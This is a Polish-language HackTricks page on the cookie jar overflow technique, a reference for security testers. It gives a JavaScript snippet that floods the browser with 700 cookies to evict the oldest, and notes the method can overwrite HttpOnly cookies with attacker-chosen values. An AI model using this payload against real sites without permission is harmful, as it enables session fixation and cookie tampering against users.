HackTricks
Tip
Ucz się i ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcji!
- Dołącz do 💬 grupy Discord, grupy telegram, obserwuj @hacktricks_live na X/Twitter, albo sprawdź stronę LinkedIn i kanał YouTube.
- Dziel się hacking tricks, wysyłając PR do repozytoriów github HackTricks i HackTricks Cloud.
Przeglądarki mają limit liczby ciasteczek, które mogą przechowywać dla danej strony. Jeśli z jakiegoś powodu musisz sprawić, aby ciasteczko zniknęło, możesz przepełnić słoik z ciasteczkami, ponieważ najstarsze zostaną usunięte przed:
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
Zauważ, że pliki cookie stron trzecich wskazujące na inna domenę nie będą nadpisywane.
[!OSTRZEŻENIE] Ta atak może być również użyty do nadpisania plików cookie HttpOnly, ponieważ możesz je usunąć, a następnie zresetować z wartością, którą chcesz.
Sprawdź to w tym poście z laboratorium.
Tip
Ucz się i ćwicz AWS Hacking:
Ucz się i ćwicz GCP Hacking:
Ucz się i ćwicz Az Hacking:Wsparcie HackTricks
- Sprawdź plany subskrypcji!
- Dołącz do 💬 grupy Discord, grupy telegram, obserwuj @hacktricks_live na X/Twitter, albo sprawdź stronę LinkedIn i kanał YouTube.
- Dziel się hacking tricks, wysyłając PR do repozytoriów github HackTricks i HackTricks Cloud.